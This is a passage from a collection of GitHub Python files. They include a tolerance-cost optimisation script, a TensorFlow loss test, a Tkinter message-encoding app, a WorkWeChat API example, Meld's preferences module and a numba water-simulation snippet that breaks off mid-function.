h_pad=5.0)\r\n        # fig.suptitle('histogram for each dimension of the predicted dataframe - compare to real data')\r\n        fig.subplots_adjust(hspace=0.3, wspace=.3)\r\n        for index, col in enumerate(df_toleranz_gerissen.columns):\r\n            plot = sns.histplot(ax=axs[i][j], data=df_toleranz_gerissen, x=str(col), kde=True)\r\n            axs[i][j].axvline(x0[index], 0,10, c=\"red\")\r\n            j+=1\r\n            if j%PLOTS_PER_ROW==0:\r\n                i+=1\r\n                j=0\r\n        # plt.savefig('Tol-cost-gerissen.svg')\r\n        plt.show()\r\n    \r\n    \r\n\r\n    # visualisierung_für_validierung(x0, df, df_above)\r\n    \r\n    \r\n    # print(\"before: \", df.shape, \"----\", \"after: \", df_above.shape)\r\n\r\n    scrap = df_above.count().to_numpy()[0]\r\n    print(f\"--> Cost for tolerances {x0} is: {scrap}\")\r\n    \r\n    d = {'Kosten': [scrap]}\r\n    df_scrap = pd.DataFrame(data=d)\r\n    \r\n    x00 = {'Toleranzvektor': [x0]}\r\n    df_x00 = pd.DataFrame(data=x00)\r\n    \r\n    Opts = pd.read_csv('data/Optimierung/Kosten.csv').drop(columns=[\"Unnamed: 0\"], errors='ignore')\r\n    Tols = pd.read_csv('data/Optimierung/Toleranzvektor.csv').drop(columns=[\"Unnamed: 0\"], errors='ignore')\r\n    Opts_neu = pd.concat([Opts, df_scrap], ignore_index=True)\r\n    Tols_neu = pd.concat([Tols, df_x00], ignore_index=True)\r\n    \r\n    Opts_neu.to_csv('data/Optimierung/Kosten.csv')\r\n    Tols_neu.to_csv('data/Optimierung/Toleranzvektor.csv')\r\n\r\n    return scrap\r\n\r\n\r\n\r\nif __name__==\"__main__\":\r\n\r\n    # x0 = np.random.randint(low=4, high=30, size=10)\r\n    x0 = [218.50, 236.94, 155.25, 182.02, 250.00, 187.84, 177.13, 250.00, 246.61, 250.00]\r\n    
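# (Editor's aside on df_above above: the ten hand-written OR clauses are one
# broadcast comparison in pandas. A minimal sketch on made-up data; the column
# names and the uniform tolerance vector are hypothetical.)
import numpy as np
import pandas as pd

demo = pd.DataFrame(np.random.rand(6, 10) * 300, columns=[f"dim_{i}" for i in range(10)])
tol = np.full(10, 200.0)  # one tolerance per column, in column order

# Rows where ANY dimension exceeds its tolerance -- the same set the chained ORs select.
above = demo[(demo > tol).any(axis=1)]
scrap_count = len(above)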
cost_from_tol_hard_approach(x0)","repo_name":"d0sc/BA_BMW","sub_path":"src/model_tol_cost.py","file_name":"model_tol_cost.py","file_ext":"py","file_size_in_byte":3878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"28475477075","text":"import pytest\nimport tensorflow as tf\nfrom loguru import logger\n\nfrom hourglass_tensorflow.losses import SigmoidCrossEntropyLoss\nfrom hourglass_tensorflow.utils.tf import tf_bivariate_normal_pdf\n\ntf.config.experimental_run_functions_eagerly(True)\n\n\n# region Fixtures\n\nSAMPLE = {\n \"image\": \"015601864.jpg\",\n \"scale\": \"3.021046176409755\",\n \"bbox_tl_x\": \"627\",\n \"bbox_tl_y\": \"627\",\n \"bbox_br_x\": \"706\",\n \"bbox_br_y\": \"706\",\n \"center_x\": \"594\",\n \"center_y\": \"257\",\n \"joint_0_X\": \"620\",\n \"joint_0_Y\": \"394\",\n \"joint_0_visible\": \"1\",\n \"joint_1_X\": \"616\",\n \"joint_1_Y\": \"269\",\n \"joint_1_visible\": \"1\",\n \"joint_2_X\": \"573\",\n \"joint_2_Y\": \"185\",\n \"joint_2_visible\": \"1\",\n \"joint_3_X\": \"647\",\n \"joint_3_Y\": \"188\",\n \"joint_3_visible\": \"0\",\n \"joint_4_X\": \"661\",\n \"joint_4_Y\": \"221\",\n \"joint_4_visible\": \"1\",\n \"joint_5_X\": \"656\",\n \"joint_5_Y\": \"231\",\n \"joint_5_visible\": \"1\",\n \"joint_6_X\": \"610\",\n \"joint_6_Y\": \"187\",\n \"joint_6_visible\": \"0\",\n \"joint_7_X\": \"647\",\n \"joint_7_Y\": \"176\",\n \"joint_7_visible\": \"1\",\n \"joint_8_X\": \"637\",\n \"joint_8_Y\": \"189\",\n \"joint_8_visible\": \"0\",\n \"joint_9_X\": \"695\",\n \"joint_9_Y\": \"108\",\n \"joint_9_visible\": \"0\",\n \"joint_10_X\": \"606\",\n \"joint_10_Y\": \"217\",\n \"joint_10_visible\": \"1\",\n \"joint_11_X\": \"553\",\n \"joint_11_Y\": \"161\",\n \"joint_11_visible\": \"1\",\n \"joint_12_X\": \"601\",\n \"joint_12_Y\": \"167\",\n \"joint_12_visible\": \"1\",\n \"joint_13_X\": \"692\",\n \"joint_13_Y\": \"185\",\n \"joint_13_visible\": \"1\",\n \"joint_14_X\": \"693\",\n \"joint_14_Y\": \"240\",\n \"joint_14_visible\": \"1\",\n \"joint_15_X\": \"688\",\n \"joint_15_Y\": \"313\",\n \"joint_15_visible\": \"1\",\n \"set\": \"TRAIN\",\n}\n\n\n@pytest.fixture(scope=\"function\")\ndef gt_joints():\n return [\n [620, 394],\n [616, 269],\n [573, 185],\n [647, 188],\n [661, 221],\n [656, 231],\n [610, 187],\n [647, 176],\n [637, 189],\n [695, 108],\n [606, 217],\n [553, 161],\n [601, 167],\n [692, 185],\n [693, 240],\n [688, 313],\n ]\n\n\n@pytest.fixture(scope=\"function\")\ndef head_size(gt_joints):\n return tf.norm(\n tf.constant(gt_joints[9], dtype=tf.float32)\n - tf.constant(gt_joints[8], dtype=tf.float32),\n ord=2,\n )\n\n\n@pytest.fixture(scope=\"function\")\ndef torso_size(gt_joints):\n return tf.norm(\n tf.constant(gt_joints[8], dtype=tf.float32)\n - tf.constant(gt_joints[6], dtype=tf.float32),\n ord=2,\n )\n\n\n@pytest.fixture(scope=\"function\")\ndef error_joints():\n return [\n [30],\n [40],\n [50],\n [60],\n [70],\n [80],\n [90],\n [100],\n [100],\n [100],\n [30],\n [35],\n [40],\n [70],\n [80],\n [90],\n ]\n\n\n@pytest.fixture(scope=\"function\")\ndef pred_joints(gt_joints, error_joints):\n return tf.constant(gt_joints) - tf.constant(error_joints)\n\n\n@pytest.fixture(scope=\"function\")\ndef SHAPE():\n return tf.constant([1280, 720], dtype=tf.dtypes.int32)\n\n\n@pytest.fixture(scope=\"function\")\ndef STDDEV():\n return tf.constant([5.0, 5.0], dtype=tf.dtypes.float32)\n\n\n@pytest.fixture(scope=\"function\")\ndef gt_heatmap(gt_joints, SHAPE, STDDEV):\n return tf.transpose(\n tf.map_fn(\n 
fn=lambda x: tf_bivariate_normal_pdf(\n                tf.cast(x, tf.float32), stddev=STDDEV, shape=SHAPE\n            ),\n            elems=tf.cast(tf.constant(gt_joints), dtype=tf.dtypes.int32),\n            dtype=tf.float32,\n        ),\n        perm=[1, 2, 0],\n    )\n\n\n@pytest.fixture(scope=\"function\")\ndef pred_heatmap(pred_joints, SHAPE, STDDEV):\n    return tf.transpose(\n        tf.map_fn(\n            fn=lambda x: tf_bivariate_normal_pdf(\n                tf.cast(x, tf.float32), stddev=STDDEV, shape=SHAPE\n            ),\n            elems=tf.cast(tf.constant(pred_joints), dtype=tf.dtypes.int32),\n            dtype=tf.float32,\n        ),\n        perm=[1, 2, 0],\n    )\n\n\n@pytest.fixture(scope=\"function\")\ndef y_true_nosup(gt_heatmap):\n    return tf.expand_dims(gt_heatmap, axis=0)\n\n\n@pytest.fixture(scope=\"function\")\ndef y_pred_nosup(pred_heatmap):\n    return tf.expand_dims(pred_heatmap, axis=0)\n\n\n@pytest.fixture(scope=\"function\")\ndef y_true(gt_heatmap):\n    return tf.expand_dims(tf.expand_dims(gt_heatmap, axis=0), axis=0)\n\n\n@pytest.fixture(scope=\"function\")\ndef y_pred(pred_heatmap):\n    return tf.expand_dims(tf.expand_dims(pred_heatmap, axis=0), axis=0)\n\n\n# endregion\n\n\ndef test_sigmoid_cross_entropy_loss(y_true, y_pred):\n    epsilon = tf.constant(0.00001)\n    estimated_error = tf.constant(0.6931466)\n\n    loss = SigmoidCrossEntropyLoss()\n    loss.call(y_true, y_pred)\n\n    assert (\n        tf.abs(loss(y_true, y_pred) - estimated_error) <= epsilon\n    ), f\"{loss.__class__.__name__} estimated error is incorrect. EXPECTED {estimated_error}. RECEIVED: {loss(y_true, y_pred)}\"\n","repo_name":"wbenbihi/hourglasstensorflow","sub_path":"tests/test_losses.py","file_name":"test_losses.py","file_ext":"py","file_size_in_byte":4934,"program_lang":"python","lang":"en","doc_type":"code","stars":479,"dataset":"github-code","pt":"3"} +{"seq_id":"8296143490","text":"from tkinter import *\r\nimport base64\r\nfrom tkinter import messagebox\r\nroot = Tk()\r\n\r\nroot.geometry(\"600x300\")\r\n\r\nroot.title(\" Message Encryption and Decryption\")\r\n\r\n\r\nMsg = StringVar()\r\nkey = StringVar()\r\nmode = StringVar()\r\nResult = StringVar()\r\n\r\nlabel = Label(root, text='Enter Message', font=('Helvetica',10))\r\nlabel.place(x=10,y=0)\r\n\r\nmes = Entry(root,textvariable=Msg, font=('calibre',10,'normal'))\r\nmes.place(x=200,y=0)\r\n\r\nlabel1 = Label(root, text='e for encrypt and d for decrypt', font=('Helvetica',10))\r\nlabel1.place(x=10,y=50)\r\n\r\nl_mode = Entry(root, textvariable=mode, font=('calibre',10,'normal'))\r\nl_mode.place(x=200,y=50)\r\n\r\nlabel2 = Label(root, text='Enter key', font=('Helvetica',10))\r\nlabel2.place(x=10,y=100)\r\n\r\nl_key = Entry(root, textvariable=key, font=('calibre',10,'normal'))\r\nl_key.place(x=200,y=100)\r\n\r\nlabel3 = Label(root, text='Result', font=('Helvetica',10))\r\nlabel3.place(x=10,y=150)\r\n\r\nres = Entry(root,textvariable=Result, font=('calibre',10,'normal'))\r\nres.place(x=200,y=150)\r\n\r\n\r\ndef encode(key, msg):\r\n    enc = []\r\n    for i in range(len(msg)):\r\n        key_c = key[i % len(key)]\r\n        enc_c = chr((ord(msg[i]) +\r\n                     ord(key_c)) % 256)\r\n        enc.append(enc_c)\r\n    return base64.urlsafe_b64encode(\"\".join(enc).encode()).decode()\r\n\r\n\r\n\r\ndef decode(key, enc):\r\n    dec = []\r\n    enc = base64.urlsafe_b64decode(enc).decode()\r\n    for i in range(len(enc)):\r\n        key_c = key[i % len(key)]\r\n        dec_c = chr((256 + ord(enc[i]) - ord(key_c)) % 256)\r\n\r\n        dec.append(dec_c)\r\n    return \"\".join(dec)\r\n\r\n\r\ndef Results():\r\n    msg = Msg.get()\r\n    k = key.get()\r\n    m = mode.get()\r\n    m = m.lower()\r\n    if (m == 'e'):\r\n        Result.set(encode(k, msg))\r\n    elif (m == 'd'):\r\n        Result.set(decode(k, msg))\r\n    
else:\r\n        messagebox.showinfo('Shantanu', 'Wrong mode entered. Try again.')\r\n\r\n\r\n\r\ndef qExit():\r\n    root.destroy()\r\n\r\n\r\n\r\ndef Reset():\r\n    Msg.set(\"\")\r\n    key.set(\"\")\r\n    mode.set(\"\")\r\n    Result.set(\"\")\r\n\r\n\r\nbtnshow = Button(root, text='Show Message', foreground='green', command=Results)\r\nbtnshow.place(x=10,y=200)\r\n\r\nbtnreset = Button(root, text='Reset', foreground='red', command=Reset)\r\nbtnreset.place(x=150,y=200)\r\n\r\nbtnexit = Button(root, text='Exit', foreground='black', command=qExit)\r\nbtnexit.place(x=300,y=200)\r\n\r\n\r\nroot.mainloop()\r\n","repo_name":"ghostpye07/Python_projects","sub_path":"Message Encoding and Decoding app.py","file_name":"Message Encoding and Decoding app.py","file_ext":"py","file_size_in_byte":2327,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"10658891618","text":"from gettext import gettext as _\n\nimport gtk\n\nfrom ui import gnomeglade\nimport misc\nimport paths\nfrom util import prefs\nimport vc\n\nfrom util.sourceviewer import srcviewer\n\n\nclass ListWidget(gnomeglade.Component):\n    def __init__(self, columns, prefs, key):\n        gnomeglade.Component.__init__(self, paths.ui_dir(\"preferences.glade\"), \"listwidget\")\n        self.prefs = prefs\n        self.key = key\n        self.treeview.set_model( gtk.ListStore( *[c[1] for c in columns] ) )\n        view = self.treeview\n        def addTextCol(label, colnum):\n            model = view.get_model()\n            rentext = gtk.CellRendererText()\n            rentext.props.editable = 1\n            def change_text(ren, path, text):\n                model[path][colnum] = text\n                self._update_filter_string()\n            rentext.connect(\"edited\", change_text)\n            column = gtk.TreeViewColumn(label, rentext, text=colnum)\n            view.append_column(column)\n        def addToggleCol(label, colnum):\n            model = view.get_model()\n            rentoggle = gtk.CellRendererToggle()\n            def change_toggle(ren, path):\n                model[path][colnum] = not ren.get_active()\n                self._update_filter_string()\n            rentoggle.connect(\"toggled\", change_toggle)\n            column = gtk.TreeViewColumn(label, rentoggle, active=colnum)\n            view.append_column(column)\n        for c,i in zip( columns, range(len(columns))):\n            if c[1] == type(\"\"):\n                addTextCol(c[0], i)\n            elif c[1] == type(0):\n                addToggleCol( c[0], 1)\n        view.get_selection().connect('changed', self._update_sensitivity)\n        view.get_model().connect('row-inserted', self._update_sensitivity)\n        view.get_model().connect('rows-reordered', self._update_sensitivity)\n        self._update_sensitivity()\n        self._update_filter_model()\n\n    def _update_sensitivity(self, *args):\n        (model, it, path) = self._get_selected()\n        if not it:\n            self.item_delete.set_sensitive(False)\n            self.item_up.set_sensitive(False)\n            self.item_down.set_sensitive(False)\n        else:\n            self.item_delete.set_sensitive(True)\n            self.item_up.set_sensitive(path > 0)\n            self.item_down.set_sensitive(path < len(model) - 1)\n\n    def on_item_new_clicked(self, button):\n        model = self.treeview.get_model()\n        model.append([_(\"label\"), 0, _(\"pattern\")])\n        self._update_filter_string()\n    def _get_selected(self):\n        (model, it) = self.treeview.get_selection().get_selected()\n        if it:\n            path = model.get_path(it)[0]\n        else:\n            path = None\n        return (model, it, path)\n    def on_item_delete_clicked(self, button):\n        (model, it, path) = self._get_selected()\n        model.remove(it)\n        self._update_filter_string()\n    def on_item_up_clicked(self, button):\n        (model, it, path) = self._get_selected()\n        model.swap(it, model.get_iter(path - 1))\n        self._update_filter_string()\n    def on_item_down_clicked(self, button):\n        (model, it, 
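# (Editor's aside on the Tkinter record above: encode/decode implement a
# Vigenere-style byte shift wrapped in URL-safe base64, so decoding with the
# same key is an exact inverse. A standalone re-implementation for illustration:)
import base64

def vigenere_encode(key, msg):
    enc = [chr((ord(c) + ord(key[i % len(key)])) % 256) for i, c in enumerate(msg)]
    return base64.urlsafe_b64encode("".join(enc).encode()).decode()

def vigenere_decode(key, token):
    raw = base64.urlsafe_b64decode(token).decode()
    return "".join(chr((256 + ord(c) - ord(key[i % len(key)])) % 256) for i, c in enumerate(raw))

# Round trip: decoding with the same key recovers the message exactly.
assert vigenere_decode("secret", vigenere_encode("secret", "hello world")) == "hello world"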
path) = self._get_selected()\n model.swap(it, model.get_iter(path + 1))\n self._update_filter_string()\n def on_items_revert_clicked(self, button):\n setattr( self.prefs, self.key, self.prefs.get_default(self.key) )\n self._update_filter_model()\n def _update_filter_string(self):\n model = self.treeview.get_model()\n pref = []\n for row in model:\n pref.append(\"%s\\t%s\\t%s\" % (row[0], row[1], row[2]))\n setattr( self.prefs, self.key, \"\\n\".join(pref) )\n def _update_filter_model(self):\n model = self.treeview.get_model()\n model.clear()\n for filtstring in getattr( self.prefs, self.key).split(\"\\n\"):\n filt = misc.ListItem(filtstring)\n model.append([filt.name, filt.active, filt.value])\n \n\nclass PreferencesDialog(gnomeglade.Component):\n\n def __init__(self, parentapp):\n gnomeglade.Component.__init__(self, paths.ui_dir(\"preferences.glade\"), \"preferencesdialog\")\n self.widget.set_transient_for(parentapp.widget)\n self.prefs = parentapp.prefs\n if not self.prefs.use_custom_font:\n self.checkbutton_default_font.set_active(True)\n self.fontpicker.set_sensitive(False)\n else:\n self.checkbutton_default_font.set_active(False)\n self.fontpicker.set_sensitive(True)\n self.fontpicker.set_font_name(self.prefs.custom_font)\n self.fontpicker.set_font_name( self.prefs.custom_font )\n self.spinbutton_tabsize.set_value( self.prefs.tab_size )\n if srcviewer.gsv is not None:\n self.checkbutton_spaces_instead_of_tabs.set_active( self.prefs.spaces_instead_of_tabs )\n self.checkbutton_show_line_numbers.set_active( self.prefs.show_line_numbers )\n self.checkbutton_use_syntax_highlighting.set_active( self.prefs.use_syntax_highlighting )\n else:\n self.checkbutton_spaces_instead_of_tabs.set_sensitive(False)\n self.checkbutton_show_line_numbers.set_sensitive(False)\n self.checkbutton_use_syntax_highlighting.set_sensitive(False)\n if gtk.pygtk_version >= (2, 12, 0):\n no_sourceview_text = _(\"Only available if you have gnome-python-desktop installed\")\n self.checkbutton_spaces_instead_of_tabs.set_tooltip_text(no_sourceview_text)\n self.checkbutton_show_line_numbers.set_tooltip_text(no_sourceview_text)\n self.checkbutton_use_syntax_highlighting.set_tooltip_text(no_sourceview_text)\n # TODO: This doesn't restore the state of character wrapping when word\n # wrapping is disabled, but this is hard with our existing gconf keys\n if self.prefs.edit_wrap_lines != gtk.WRAP_NONE:\n if self.prefs.edit_wrap_lines == gtk.WRAP_CHAR:\n self.checkbutton_split_words.set_active(False)\n self.checkbutton_wrap_text.set_active(True)\n\n size_group = gtk.SizeGroup(gtk.SIZE_GROUP_HORIZONTAL)\n size_group.add_widget(self.label1)\n size_group.add_widget(self.label2)\n size_group.add_widget(self.label16)\n use_default = self.prefs.edit_command_type == \"internal\" or \\\n self.prefs.edit_command_type == \"gnome\"\n self.system_editor_checkbutton.set_active(use_default)\n self.custom_edit_command_entry.set_sensitive(not use_default)\n self.custom_edit_command_entry.set_text( \" \".join(self.prefs.get_custom_editor_command([])) )\n\n # file filters\n cols = [ (_(\"Name\"), type(\"\")), (_(\"Active\"), type(0)), (_(\"Pattern\"), type(\"\")) ]\n self.filefilter = ListWidget( cols, self.prefs, \"filters\")\n self.file_filters_tab.pack_start(self.filefilter.widget)\n self.checkbutton_ignore_symlinks.set_active( self.prefs.ignore_symlinks)\n # text filters\n cols = [ (_(\"Name\"), type(\"\")), (_(\"Active\"), type(0)), (_(\"Regex\"), type(\"\")) ]\n self.textfilter = ListWidget( cols, self.prefs, \"regexes\")\n 
self.text_filters_tab.pack_start(self.textfilter.widget)\n self.checkbutton_ignore_blank_lines.set_active( self.prefs.ignore_blank_lines )\n # encoding\n self.entry_text_codecs.set_text( self.prefs.text_codecs )\n #\n # editor\n #\n def on_fontpicker_font_set(self, picker):\n self.prefs.custom_font = picker.get_font_name()\n\n def on_checkbutton_default_font_toggled(self, button):\n use_custom = not button.get_active()\n self.fontpicker.set_sensitive(use_custom)\n self.prefs.use_custom_font = use_custom\n\n def on_spinbutton_tabsize_changed(self, spin):\n self.prefs.tab_size = int(spin.get_value())\n def on_checkbutton_spaces_instead_of_tabs_toggled(self, check):\n self.prefs.spaces_instead_of_tabs = check.get_active()\n\n def on_checkbutton_wrap_text_toggled(self, button):\n if not self.checkbutton_wrap_text.get_active():\n self.prefs.edit_wrap_lines = 0\n self.checkbutton_split_words.set_sensitive(False)\n else:\n self.checkbutton_split_words.set_sensitive(True)\n if self.checkbutton_split_words.get_active():\n self.prefs.edit_wrap_lines = 2\n else:\n self.prefs.edit_wrap_lines = 1\n\n def on_checkbutton_show_line_numbers_toggled(self, check):\n self.prefs.show_line_numbers = check.get_active()\n def on_checkbutton_use_syntax_highlighting_toggled(self, check):\n self.prefs.use_syntax_highlighting = check.get_active()\n\n def on_system_editor_checkbutton_toggled(self, check):\n use_default = check.get_active()\n self.custom_edit_command_entry.set_sensitive(not use_default)\n if use_default:\n self.prefs.edit_command_type = \"gnome\"\n else:\n self.prefs.edit_command_type = \"custom\"\n\n def on_custom_edit_command_entry_activate(self, entry, *args):\n # Called on \"activate\" and \"focus-out-event\"\n self.prefs.edit_command_custom = entry.props.text\n\n #\n # filters\n #\n def on_checkbutton_ignore_symlinks_toggled(self, check):\n self.prefs.ignore_symlinks = check.get_active()\n def on_checkbutton_ignore_blank_lines_toggled(self, check):\n self.prefs.ignore_blank_lines = check.get_active()\n\n def on_entry_text_codecs_activate(self, entry, *args):\n # Called on \"activate\" and \"focus-out-event\"\n self.prefs.text_codecs = entry.props.text\n\n def on_response(self, dialog, response_id):\n self.widget.destroy()\n\n\nclass MeldPreferences(prefs.Preferences):\n defaults = {\n \"window_size_x\": prefs.Value(prefs.INT, 600),\n \"window_size_y\": prefs.Value(prefs.INT, 600),\n \"use_custom_font\": prefs.Value(prefs.BOOL,0),\n \"custom_font\": prefs.Value(prefs.STRING,\"monospace, 14\"),\n \"tab_size\": prefs.Value(prefs.INT, 4),\n \"spaces_instead_of_tabs\": prefs.Value(prefs.BOOL, False),\n \"show_line_numbers\": prefs.Value(prefs.BOOL, 0),\n \"use_syntax_highlighting\": prefs.Value(prefs.BOOL, 0),\n \"edit_wrap_lines\" : prefs.Value(prefs.INT, 0),\n \"edit_command_type\" : prefs.Value(prefs.STRING, \"gnome\"), #gnome, custom\n \"edit_command_custom\" : prefs.Value(prefs.STRING, \"gedit\"),\n \"text_codecs\": prefs.Value(prefs.STRING, \"utf8 latin1\"),\n \"ignore_symlinks\": prefs.Value(prefs.BOOL,0),\n \"vc_console_visible\": prefs.Value(prefs.BOOL, 0),\n \"color_delete_bg\" : prefs.Value(prefs.STRING, \"#003300\"),\n \"color_delete_fg\" : prefs.Value(prefs.STRING, \"Red\"),\n \"color_replace_bg\" : prefs.Value(prefs.STRING, \"#112233\"),\n \"color_replace_fg\" : prefs.Value(prefs.STRING, \"gray80\"),\n \"color_conflict_bg\" : prefs.Value(prefs.STRING, \"Brown\"),\n \"color_conflict_fg\" : prefs.Value(prefs.STRING, \"White\"),\n \"color_inline_bg\" : prefs.Value(prefs.STRING, 
\"#223344\"),\n \"color_inline_fg\" : prefs.Value(prefs.STRING, \"White\"),\n \"color_edited_bg\" : prefs.Value(prefs.STRING, \"gray20\"),\n \"color_edited_fg\" : prefs.Value(prefs.STRING, \"White\"),\n \"filters\" : prefs.Value(prefs.STRING,\n #TRANSLATORS: translate this string ONLY to the first \"\\t\", leave it and the following parts intact\n _(\"Backups\\t1\\t#*# .#* ~* *~ *.{orig,bak,swp}\\n\") + \\\n #TRANSLATORS: translate this string ONLY to the first \"\\t\", leave it and the following parts intact\n _(\"Version Control\\t1\\t%s\\n\") % misc.shell_escape(' '.join(vc.get_plugins_metadata())) + \\\n #TRANSLATORS: translate this string ONLY to the first \"\\t\", leave it and the following parts intact\n _(\"Binaries\\t1\\t*.{pyc,a,obj,o,so,la,lib,dll}\\n\") + \\\n #TRANSLATORS: translate this string ONLY to the first \"\\t\", leave it and the following parts intact\n _(\"Media\\t0\\t*.{jpg,gif,png,wav,mp3,ogg,xcf,xpm}\")),\n #TRANSLATORS: translate this string ONLY to the first \"\\t\", leave it and the following parts intact\n \"regexes\" : prefs.Value(prefs.STRING, _(\"CVS keywords\\t0\\t\\$\\\\w+(:[^\\\\n$]+)?\\$\\n\") + \\\n #TRANSLATORS: translate this string ONLY to the first \"\\t\", leave it and the following parts intact\n _(\"C++ comment\\t0\\t//.*\\n\") + \\\n #TRANSLATORS: translate this string ONLY to the first \"\\t\", leave it and the following parts intact\n _(\"C comment\\t0\\t/\\*.*?\\*/\\n\") + \\\n #TRANSLATORS: translate this string ONLY to the first \"\\t\", leave it and the following parts intact\n _(\"All whitespace\\t0\\t[ \\\\t\\\\r\\\\f\\\\v]*\\n\") + \\\n #TRANSLATORS: translate this string ONLY to the first \"\\t\", leave it and the following parts intact\n _(\"Leading whitespace\\t0\\t^[ \\\\t\\\\r\\\\f\\\\v]*\\n\") + \\\n #TRANSLATORS: translate this string ONLY to the first \"\\t\", leave it and the following parts intact\n _(\"Script comment\\t0\\t#.*\")),\n \"ignore_blank_lines\" : prefs.Value(prefs.BOOL, False),\n \"toolbar_visible\" : prefs.Value(prefs.BOOL, True),\n \"statusbar_visible\" : prefs.Value(prefs.BOOL, True)\n }\n\n def __init__(self):\n super(MeldPreferences, self).__init__(\"/apps/meld\", self.defaults)\n\n def get_current_font(self):\n if self.use_custom_font:\n return self.custom_font\n else:\n if not hasattr(self, \"_gconf\"):\n return \"Monospace 10\"\n return self._gconf.get_string('/desktop/gnome/interface/monospace_font_name') or \"Monospace 10\"\n\n def get_toolbar_style(self):\n if not hasattr(self, \"_gconf\"):\n return gtk.TOOLBAR_BOTH\n style = self._gconf.get_string('/desktop/gnome/interface/toolbar_style') or \"both\"\n style = {\"both\":gtk.TOOLBAR_BOTH, \"text\":gtk.TOOLBAR_TEXT,\n \"icon\":gtk.TOOLBAR_ICONS, \"icons\":gtk.TOOLBAR_ICONS,\n \"both_horiz\":gtk.TOOLBAR_BOTH_HORIZ,\n \"both-horiz\":gtk.TOOLBAR_BOTH_HORIZ\n }[style]\n return style\n\n def get_gnome_editor_command(self, files):\n if not hasattr(self, \"_gconf\"):\n return []\n argv = []\n editor = self._gconf.get_string('/desktop/gnome/applications/editor/exec') or \"gedit\"\n if self._gconf.get_bool(\"/desktop/gnome/applications/editor/needs_term\"):\n texec = self._gconf.get_string(\"/desktop/gnome/applications/terminal/exec\")\n if texec:\n argv.append(texec)\n targ = self._gconf.get_string(\"/desktop/gnome/applications/terminal/exec_arg\")\n if targ:\n argv.append(targ)\n argv.append( \"%s %s\" % (editor, \" \".join( [f.replace(\" \",\"\\\\ \") for f in files]) ) )\n else:\n argv = [editor] + files\n return argv\n\n def get_custom_editor_command(self, 
files):\n        return self.edit_command_custom.split() + files\n\n","repo_name":"hbt/meld","sub_path":"meld/preferences.py","file_name":"preferences.py","file_ext":"py","file_size_in_byte":14966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"27365308704","text":"import os\n\nimport work_wechat\n\ncorpid = os.environ.get(\"CORPID\")\ncorpsecret = os.environ.get(\"CORPSECRET\")\nmydepartid = os.environ.get(\"MYDEPARTID\")\n\nww = work_wechat.WorkWeChat(corpid=corpid, corpsecret=corpsecret)\nrs = ww.user_simplelist(department_id=mydepartid, fetch_child=True)\nprint(rs)\n","repo_name":"softpeng/WorkWeChatSDK","sub_path":"examples/get_employee_list_by_depart.py","file_name":"get_employee_list_by_depart.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"44417834709","text":"import numba as nb\nimport numpy as np\nfrom OpenGL.GL import *\nfrom numpy.random import randint\nimport math\nfrom glfw import *\nimport platform\nimport os\ntry:\n    del os.environ['DISPLAY']\nexcept KeyError:\n    pass\n\nenv = platform.system()\nwindowsize = (800 * 2, 600 * 2) if env == 'Darwin' else (800, 600)\n\n__buffer = np.zeros(windowsize[0] * windowsize[1] * 3)\n\n\n@nb.jit()\ndef iterBuff(buffer, func):\n    for i, v in enumerate(buffer):\n        buffer[i] = func(i, v)\n    return buffer\n\n\ndef create_buffer_editor(callback):\n    @nb.jit(nopython=True)\n    def func(buffer):\n        for i, v in enumerate(buffer):\n            buffer[i] = callback(i, v)\n        return buffer\n    return func\n    \n@nb.jit(nopython=True, fastmath=True)\ndef control(i, v):\n    pass\niterBuffer = create_buffer_editor(control)\n\n@nb.jit(nopython=True, fastmath=True)\ndef update_process(i, v):\n    pass\nupdate_buffer = create_buffer_editor(update_process)\n\n\n@nb.jit(nopython=True, fastmath=True)\ndef has(vec, val):\n    res = False\n    if np.where(vec == val)[0].shape[0] > 0:\n        res = True\n    return res\n\n@nb.jit(nopython=True, fastmath=True)\ndef idx(x, y):\n    return (y * windowsize[0] + x) * 3\n\ndef fill_water(x, y):\n    if(idx(x, y) < len(__buffer)):\n        __buffer[idx(x, y)] = 0\n        __buffer[idx(x, y) + 1] = 0\n        __buffer[idx(x, y) + 2] = 255\n\n\n@nb.jit(nopython=True, fastmath=True)\ndef validate_frag(buffer, base_index, rgb):\n    return (\n        buffer[base_index] == rgb[0] \n        and buffer[base_index + 1] == rgb[1] \n        and buffer[base_index + 2] == rgb[2]\n    )\n\n@nb.jit(nopython=True, fastmath=True)\ndef is_fragment_empty(buffer, index):\n    return validate_frag(buffer, index, (0, 0, 0))\n\n\n@nb.jit(nopython=True, fastmath=True)\ndef exists(buffer, index):\n    return index <= len(buffer)\n\n@nb.jit(nopython=True, fastmath=True)\ndef update_water(time, buffer, sandy): # sandy is for testing\n    mem = np.zeros(windowsize[0] * windowsize[1] * 3) # ensures each cell is updated only once per frame (any non-zero marker would do, not just 255). Inefficient; needs a rewrite\n    for y in range(windowsize[1]):\n        for x in range(windowsize[0]):\n            \n            current = idx(x, y)\n            down = idx(x, y + 1)\n            left_down = idx(x - 1, y + 1)\n            right_down = idx(x + 1, y + 1)\n            left = idx(x - 1, y)\n            right = idx(x + 1, y)\n\n            if(exists(buffer, down + 2) and mem[current] == 0): # add time % ms == 0 here to set an update period; mem ensures one update per cell. Inefficient; needs a rewrite
\n                is_blue = validate_frag(buffer, current, (0, 0, 255))\n                if(is_blue and is_fragment_empty(buffer, down)):\n                    mem[down] = 255\n                    buffer[down + 2] = 255 # fill the cell below\n                    buffer[current + 2] = 0 # clear the current cell\n\n                elif(is_blue and is_fragment_empty(buffer, left_down)):\n                    mem[left_down] = 255\n                    buffer[left_down + 2] = 255\n                    buffer[current + 2] = 0\n\n                elif(is_blue and is_fragment_empty(buffer, right_down)): # up to here it behaves like a granular solid..\n                    mem[right_down] = 255\n                    buffer[right_down + 2] = 255\n                    buffer[current + 2] = 0\n                \n                elif(is_blue and is_fragment_empty(buffer, right) and not sandy): # from here on it takes on liquid behaviour\n                    mem[right] = 255\n                    buffer[right + 2] = 255\n                    buffer[current + 2] = 0 \n\n                elif(is_blue and is_fragment_empty(buffer, left) and not sandy):\n                    mem[left] = 255\n                    buffer[left + 2] = 255\n                    buffer[current + 2] = 0 \n\nwater_fill_range = 100\ndef 